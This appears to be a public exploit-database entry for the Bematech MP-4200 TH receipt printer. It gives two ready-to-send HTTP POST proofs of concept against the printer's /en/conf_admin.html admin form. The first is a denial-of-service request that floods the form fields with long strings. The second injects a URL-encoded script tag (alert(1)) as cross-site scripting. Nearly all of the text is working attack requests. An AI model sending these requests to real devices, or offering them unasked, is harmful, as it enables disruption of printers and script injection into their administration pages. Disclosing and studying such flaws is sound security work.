41 lines
No EOL
1.8 KiB
Text
41 lines
No EOL
1.8 KiB
Text
# Exploit Title: Bematech Printer MP-4200 - Denial of Service
|
|
# Date: 2019-11-11
|
|
# Exploit Author: Jonatas Fil
|
|
# Vendor Homepage: https://www.bematech.com.br/
|
|
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
|
|
# Version: MP-4200 TH
|
|
# Tested on: Windows and Linux
|
|
# CVE : N/A
|
|
|
|
DoS Poc:
|
|
--------------------------------------------------------------------------------------------------------
|
|
POST /en/conf_admin.html HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
|
|
like Gecko) Chrome/73.0.3683.75 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9,pt;q=0.8
|
|
Cache-Control: max-age=0
|
|
Referer: http://TARGET/en/conf_admin.html
|
|
Content-Length: 40
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
|
|
|
|
--------------------------------------------------------------------------------------------------------
|
|
XSS Poc:
|
|
--------------------------------------------------------------------------------------------------------
|
|
POST /en/conf_admin.html HTTP/1.1
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
|
|
like Gecko) Chrome/73.0.3683.75 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9,pt;q=0.8
|
|
Cache-Control: max-age=0
|
|
Referer: http://printer.com/en/conf_admin.html
|
|
Content-Length: 40
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit |